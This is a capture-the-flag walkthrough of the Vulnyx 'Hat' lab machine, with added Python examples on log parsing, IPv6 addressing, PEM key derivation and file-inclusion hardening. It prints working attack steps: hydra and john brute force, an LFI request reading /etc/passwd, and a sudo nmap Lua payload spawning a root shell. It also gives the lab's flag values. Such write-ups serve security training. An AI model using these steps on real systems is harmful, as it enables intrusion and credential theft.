Vulnyx-Hat-Walkthrough
Author: 城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.209 08:00:27:7d:13:98 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.064 seconds (124.03 hosts/sec). 4 responded
export ip=192.168.60.209
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.209:80
Open 192.168.60.209:65535
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 13:34 CST
Initiating ARP Ping Scan at 13:34
Scanning 192.168.60.209 [1 port]
Completed ARP Ping Scan at 13:34, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:34
Completed Parallel DNS resolution of 1 host. at 13:34, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:34
Scanning 192.168.60.209 [2 ports]
Discovered open port 65535/tcp on 192.168.60.209
Discovered open port 80/tcp on 192.168.60.209
Completed SYN Stealth Scan at 13:34, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.209
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-02-26 13:34:18 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
65535/tcp open unknown syn-ack ttl 64
MAC Address: 08:00:27:7D:13:98 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 22 is not open over IPv4, but there is an unusual high port, 65535.

Start by enumerating directories on port 80.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.209
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.60.209/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.60.209/php-scripts/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Log Disclosure

Connect to port 65535 with nc to grab the banner.

The banner identifies the service as pyftpdlib.

❯ nc -vn $ip 65535
(UNKNOWN) [192.168.60.209] 65535 (?) open
220 pyftpdlib 1.5.4 ready.

pyftpdlib is a high-performance, extensible FTP server library written in Python; it lets you build and customize an FTP server from inside a Python program.

Connect with the ftp client, then: anonymous login is not allowed.

❯ ftp anonymous@$ip 65535
Connected to 192.168.60.209.
220 pyftpdlib 1.5.4 ready.
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> exit
221 Goodbye.

The /logs directory from the first scan is worth a closer look, so rescan it with the log extension added.

This turns up /logs/vsftpd.log (despite the name, the contents are in pyftpdlib's log format, matching the service on port 65535).

❯ gobuster dir -u http://$ip/logs -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.209/logs
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt,log
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1760]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
===============================================================

Fetch the log with curl.

It records a username brute force from 192.168.1.83: a run of failed logins, then one successful login as admin_ftp. The successful name is the one to attack, but the failed usernames are worth keeping as candidates as well.

❯ curl http://192.168.60.209/logs/vsftpd.log

[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).
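As an added example that is not part of the original walkthrough, the parser below pulls login outcomes out of a leaked pyftpdlib log so the successful and failed usernames can be fed straight to hydra. The sample lines are constructed in the format shown above; only the usernames and the client IP are taken from the real log.

```python
"""Extract login events from a pyftpdlib log (added example, not from the walkthrough)."""
import re
from collections import defaultdict

# pyftpdlib login lines look like:
#   [I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'x' failed login.
#   [I 2021-09-28 18:44:09] 192.168.1.83:49280-[x] USER 'x' logged in.
LOG_LINE = re.compile(
    r"^\[(?P<level>[A-Z]) (?P<ts>[\d-]+ [\d:]+)\] "
    r"(?P<ip>[\d.]+):(?P<port>\d+)-\[(?P<session_user>[^\]]*)\] "
    r"USER '(?P<user>[^']*)' (?P<result>failed login|logged in)\.$"
)

# Constructed sample in the format of the vsftpd.log fetched above.
SAMPLE_LOG = """\
[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
"""


def parse_logins(text):
    """Return (successful, failed): each maps username -> list of (timestamp, client ip)."""
    ok, failed = defaultdict(list), defaultdict(list)
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # server start, connect/disconnect and other non-login lines
        target = ok if m["result"] == "logged in" else failed
        target[m["user"]].append((m["ts"], m["ip"]))
    return dict(ok), dict(failed)


def candidate_usernames(text):
    """All usernames seen in the log, successful ones first: a wordlist for hydra -L."""
    ok, failed = parse_logins(text)
    return list(ok) + [u for u in failed if u not in ok]


if __name__ == "__main__":
    ok, failed = parse_logins(SAMPLE_LOG)
    for user, events in ok.items():
        print(f"[+] {user} logged in from {events[0][1]} at {events[0][0]}")
    print("[*] failed logins:", ", ".join(failed))
```

Run it against the real file with `curl -s http://$ip/logs/vsftpd.log | python3 -c 'import sys; ...'` or by reading the saved log; the point is that a world-readable FTP log discloses valid account names even when no password ever appears in it.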

FTP Brute Force

Brute-force admin_ftp's password with hydra (-s 65535 points it at the non-standard port).

The password is cowboy.

❯ hydra -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://$ip -s 65535 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-26 14:11:34
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.60.209:65535/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 289.00 tries/min, 867 tries in 00:03h, 14343532 to do in 827:12h, 16 active
[65535][ftp] host: 192.168.60.209 login: admin_ftp password: cowboy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-26 14:15:44

Log in with it; the world-writable share directory contains a private key and a note.

❯ ftp admin_ftp@$ip 65535
Connected to 192.168.60.209.
220 pyftpdlib 1.5.4 ready.
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||53381|).
150 File status okay. About to open data connection.
drwxrwxrwx 2 cromiphi cromiphi 4096 Sep 28 2021 share
226 Transfer complete.
ftp> cd share
250 "/share" is the current directory.
ftp> ls
229 Entering extended passive mode (|||34087|).
150 File status okay. About to open data connection.
-rwxrwxrwx 1 cromiphi cromiphi 1751 Sep 28 2021 id_rsa
-rwxrwxrwx 1 cromiphi cromiphi 108 Sep 28 2021 note
226 Transfer complete.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering extended passive mode (|||55203|).
150 File status okay. About to open data connection.
100% |*********************************************************************************************************| 1751 545.44 KiB/s 00:00 ETA
226 Transfer complete.
1751 bytes received in 00:00 (395.36 KiB/s)
ftp> get note
local: note remote: note
229 Entering extended passive mode (|||58885|).
150 File status okay. About to open data connection.
100% |*********************************************************************************************************| 108 54.08 KiB/s 00:00 ETA
226 Transfer complete.
108 bytes received in 00:00 (26.06 KiB/s)
ftp> exit
221 Goodbye.

The problem is that port 22 is not open, so there is nowhere to use the private key yet. The key itself is passphrase-protected: the Proc-Type: 4,ENCRYPTED and DEK-Info: DES-EDE3-CBC headers mark a legacy OpenSSL PEM encrypted with 3DES.

cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2
(key body omitted)
-----END RSA PRIVATE KEY-----
cat note

Hi,

We have successfully secured some of our most critical protocols ... no more worrying!



Sysadmin

User Access

The note hints that a protocol was "secured" rather than removed, and indeed SSH is open over IPv6. Pinging the all-nodes multicast group ff02::1 on the local link makes every neighbour answer with its link-local address; fe80::a00:27ff:fe7d:1398 is the EUI-64 form of the target's MAC 08:00:27:7d:13:98 seen in the arp-scan, and an nmap -6 scan of it shows port 22.

❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.185 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=1 ttl=1 time=0.284 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=1 ttl=64 time=1.47 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.023 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=2 ttl=1 time=0.277 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=2 ttl=64 time=0.554 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=3 ttl=1 time=0.363 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=3 ttl=64 time=1.22 ms
^C
--- ff02::1 ping statistics ---
3 packets transmitted, 3 received, +6 duplicates, 0% packet loss, time 2052ms
rtt min/avg/max/mdev = 0.023/0.488/1.466/0.484 ms
❯ nmap -6 fe80::a00:27ff:fe7d:1398
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:16 CST
Nmap scan report for fe80::a00:27ff:fe7d:1398
Host is up (0.0025s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:7D:13:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
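The link-local address above can be predicted from the MAC address alone, which is useful when multicast pings are filtered. The following is an added example and not part of the original walkthrough: it computes the modified EUI-64 interface identifier (insert ff:fe in the middle of the MAC and flip the universal/local bit) for the target's MAC from the arp-scan, and reverses it for an observed address. Hosts that use privacy or stable-privacy interface identifiers will not match, so treat the result as a candidate to scan, not a certainty.

```python
"""MAC <-> IPv6 link-local (EUI-64) conversion. Added example, not from the walkthrough."""
import ipaddress


def mac_to_link_local(mac: str) -> str:
    """fe80::/64 + modified EUI-64 of a 48-bit MAC, as SLAAC builds it."""
    octets = bytes(int(b, 16) for b in mac.replace("-", ":").split(":"))
    if len(octets) != 6:
        raise ValueError(f"not a 48-bit MAC: {mac!r}")
    # Split OUI and NIC halves, insert ff:fe, flip the U/L bit (bit 1 of octet 0).
    eui64 = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui64[0] ^= 0x02
    iid = int.from_bytes(eui64, "big")
    return ipaddress.IPv6Address((0xFE80 << 112) | iid).compressed


def link_local_to_mac(addr: str) -> str:
    """Inverse: recover the MAC from an EUI-64 derived fe80:: address (zone id allowed)."""
    a = ipaddress.IPv6Address(addr.split("%")[0])
    if a.packed[:8] != bytes([0xFE, 0x80] + [0] * 6):
        raise ValueError(f"not an fe80::/64 address: {addr!r}")
    iid = bytearray(a.packed[8:])
    if iid[3:5] != b"\xff\xfe":
        raise ValueError("interface id is not EUI-64 derived (privacy/stable address?)")
    iid[0] ^= 0x02
    return ":".join(f"{b:02x}" for b in iid[:3] + iid[5:])


def ssh_target(mac: str, iface: str = "eth0") -> str:
    """Link-local addresses need the outgoing interface as a zone id, e.g. for ssh -6."""
    return f"{mac_to_link_local(mac)}%{iface}"


if __name__ == "__main__":
    # MAC of the target from the arp-scan output above.
    print(ssh_target("08:00:27:7d:13:98"))
```

The attacker VM's own MAC from the arp-scan (5e:bb:f6:9e:ee:fa) maps to fe80::5cbb:f6ff:fe9e:eefa, the first responder in the ping6 output, which is a quick way to confirm the conversion against live data.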

The username is still unknown. Meanwhile, crack the key's passphrase with ssh2john and john against rockyou; it falls almost instantly to ilovemyself. John's "Cost 1 ... is 1 (MD5/3DES)" line confirms the legacy PEM key derivation, which is cheap to brute-force.

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovemyself (id_rsa)
1g 0:00:00:00 DONE (2025-02-26 15:13) 50.00g/s 80000p/s 80000c/s 80000C/s joyce..dragon1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
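Why does the passphrase crack at tens of thousands of candidates per second? Legacy OpenSSL PEM keys (BEGIN RSA PRIVATE KEY with Proc-Type/DEK-Info headers) derive the cipher key with EVP_BytesToKey: a single MD5 pass per 16 bytes of key material, salted with the first 8 bytes of the IV and no iteration count, so each guess costs two MD5 operations plus one 3DES block. The example below is added here and is not part of the walkthrough; it reads the headers printed by cat id_rsa above and reproduces that KDF. The key body is a constructed placeholder, since only the headers matter for this check, and no decryption is attempted.

```python
"""Inspect a PEM private key's encryption and reproduce OpenSSL's legacy PEM KDF.
Added example, not from the walkthrough."""
import hashlib
import re

# Headers as printed by `cat id_rsa` above; the base64 body is a constructed placeholder.
SAMPLE_KEY = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

# Key sizes in bytes for the ciphers legacy PEM encryption uses.
CIPHER_KEY_LEN = {"DES-CBC": 8, "DES-EDE3-CBC": 24, "AES-128-CBC": 16,
                  "AES-192-CBC": 24, "AES-256-CBC": 32}


def inspect_pem(text):
    """Describe how a PEM private key is protected (legacy OpenSSL or OpenSSH format)."""
    head = re.search(r"-----BEGIN ([A-Z ]+?)-----", text)
    if not head:
        raise ValueError("no PEM header found")
    info = {"type": head.group(1), "encrypted": None, "kdf": None, "cipher": None, "iv": None}
    if info["type"] == "OPENSSH PRIVATE KEY":
        # New format: kdfname/ciphername live inside the binary blob, with bcrypt_pbkdf
        # and a round count when encrypted. Not parsed here.
        info["kdf"] = "bcrypt_pbkdf if encrypted (new format, not parsed here)"
        return info
    info["encrypted"] = False
    m = re.search(r"^DEK-Info: ([A-Z0-9-]+),([0-9A-Fa-f]+)$", text, re.M)
    if "Proc-Type: 4,ENCRYPTED" in text and m:
        info.update(encrypted=True, kdf="EVP_BytesToKey(MD5, count=1)",
                    cipher=m.group(1), iv=bytes.fromhex(m.group(2)))
    return info


def evp_bytes_to_key(password: bytes, iv: bytes, key_len: int) -> bytes:
    """OpenSSL's PEM KDF: D_i = MD5(D_{i-1} || password || salt), salt = iv[:8], one round."""
    salt = iv[:8]
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + password + salt).digest()
        out += prev
    return out[:key_len]


def derive_key(text, password: str) -> bytes:
    """Cipher key a given passphrase would produce for this PEM (what a cracker tests)."""
    info = inspect_pem(text)
    if not info["encrypted"]:
        raise ValueError("key is not a legacy encrypted PEM")
    return evp_bytes_to_key(password.encode(), info["iv"], CIPHER_KEY_LEN[info["cipher"]])


if __name__ == "__main__":
    info = inspect_pem(SAMPLE_KEY)
    print(info["type"], info["cipher"], info["kdf"])
    print("3DES key for 'ilovemyself':", derive_key(SAMPLE_KEY, "ilovemyself").hex())
```

The defensive takeaway is the same check in reverse: keys generated with ssh-keygen -o (the default since OpenSSH 7.8) use the OPENSSH PRIVATE KEY format with bcrypt_pbkdf and a round count (-a), which makes each guess orders of magnitude more expensive than the MD5 construction above.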

LFI Vulnerability

Next, scan the /php-scripts directory found earlier.

It contains file.php, which returns an empty 200 response when called without parameters.

❯ gobuster dir -u http://$ip/php-scripts -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.209/php-scripts
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt,log
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7]
/file.php (Status: 200) [Size: 0]
Progress: 12481 / 1245864 (1.00%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 12552 / 1245864 (1.01%)
===============================================================
Finished
===============================================================

A script named file.php that silently accepts a request suggests a local file inclusion with an unknown parameter name.

Fuzz the parameter name with wfuzz, using /etc/passwd as the value and --hw 0 to hide the empty responses; the only hit is the parameter 6.

❯ wfuzz -c -u "http://$ip/php-scripts/file.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 --hc 404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.209/php-scripts/file.php?FUZZ=/etc/passwd
Total requests: 26584

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001358: 200 26 L 38 W 1404 Ch "6"
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 9.368297
Processed Requests: 13405
Filtered Requests: 13404
Requests/sec.: 1430.889

This reads /etc/passwd and discloses the username cromiphi, the only regular account with a login shell, and the same name that owns the files on the FTP share.

❯ curl http://192.168.60.209//php-scripts/file.php\?6\=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
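The source of file.php is not shown in the walkthrough, but the behaviour (an absolute path handed to the parameter is read verbatim) is the classic include($_GET[...]) pattern. As an added example that is not the box's code, the block below reproduces that pattern in Python beside a hardened version that resolves the real path, requires it to stay under the web root, and allow-lists the extension; the web root, page file and fake passwd it reads are constructed in a temporary directory so it runs offline.

```python
"""Local file inclusion: vulnerable path handling beside a hardened version.
Added example, not the box's file.php."""
import os
import tempfile


def include_unsafe(base_dir, requested):
    """Mirrors include($_GET['6']): join() drops base_dir when `requested` is absolute,
    and ../ segments walk out of it."""
    path = os.path.join(base_dir, requested)
    with open(path) as f:
        return f.read()


def include_safe(base_dir, requested):
    """Canonicalise, then require the real path to stay under base_dir and match an allow-list."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes {base}: {requested!r}")
    if not target.endswith(".txt"):  # allow-list the extension instead of blocking known-bad ones
        raise PermissionError(f"extension not allowed: {requested!r}")
    with open(target) as f:
        return f.read()


def demo():
    """Build a throwaway web root plus a 'passwd' outside it; report what each version returns."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = os.path.join(tmp, "www")
        os.makedirs(webroot)
        with open(os.path.join(webroot, "page.txt"), "w") as f:
            f.write("public page")
        secret = os.path.join(tmp, "passwd")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash")  # constructed stand-in for /etc/passwd

        probes = [("page.txt", "page.txt"), ("<absolute path>", secret), ("../passwd", "../passwd")]
        results = {}
        for name, fn in (("unsafe", include_unsafe), ("safe", include_safe)):
            for label, req in probes:
                try:
                    results[(name, label)] = fn(webroot, req)
                except PermissionError:
                    results[(name, label)] = "blocked"
        return results


if __name__ == "__main__":
    for (name, label), out in demo().items():
        print(f"{name:6} {label:16} -> {out}")
```

Both the absolute path used in the walkthrough (?6=/etc/passwd) and a ../ traversal are read by the unsafe version and rejected by the safe one, while the legitimate page still loads. A deny-list on "../" alone would not help against the absolute-path case.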

Now SSH in over IPv6 with the key; the %eth0 zone suffix is required because the address is link-local.

Login succeeds with the cracked passphrase.

Grab user.txt first, then check sudo rights.

❯ ssh cromiphi@fe80::a00:27ff:fe7d:1398%eth0 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@hat:~$ cat user.txt
d3ea66f59d9d6ea12351b415080b5457
cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cromiphi may run the following commands on hat:
(root) NOPASSWD: /usr/bin/nmap

Root Privilege Escalation

The user can run /usr/bin/nmap as root via sudo without a password.

First try the classic --interactive mode.

cromiphi@hat:~$ sudo /usr/bin/nmap --interactive
/usr/bin/nmap: unrecognized option '--interactive'
See the output of nmap -h for a summary of options.

That option no longer exists: interactive mode was only available in Nmap 2.02 through 5.21, and this box runs 7.70.

The --script option still loads arbitrary Lua, though. Nmap executes the script file when it loads it and only afterwards checks for the required fields, so an os.execute("/bin/sh") at the top level of the file runs as root before the "missing required field: 'action'" error is raised; the error shows up only once the shell exits.

Input echo is disabled in that shell, but commands execute normally, which is why the id and cat output below appear after bare # prompts. Note that bash -p on its own does not escalate: it only keeps an effective UID of root when the bash binary carries the setuid bit, which has to be set from inside that blind root shell (the command is not echoed in the output below).

cromiphi@hat:~$ echo 'os.execute("/bin/sh")'>aaa
cromiphi@hat:~$ sudo /usr/bin/nmap --script aaa
Starting Nmap 7.70 ( https://nmap.org ) at 2025-02-26 08:35 CET
NSE: Warning: Loading 'aaa' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) grupos=0(root)
# 8b4acc39c4d068623a16a89ebecd5048
# # NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:626: aaa is missing required field: 'action'
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:626: in field 'new'
/usr/bin/../share/nmap/nse_main.lua:828: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
[C]: in ?

QUITTING!
cromiphi@hat:~$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
8b4acc39c4d068623a16a89ebecd5048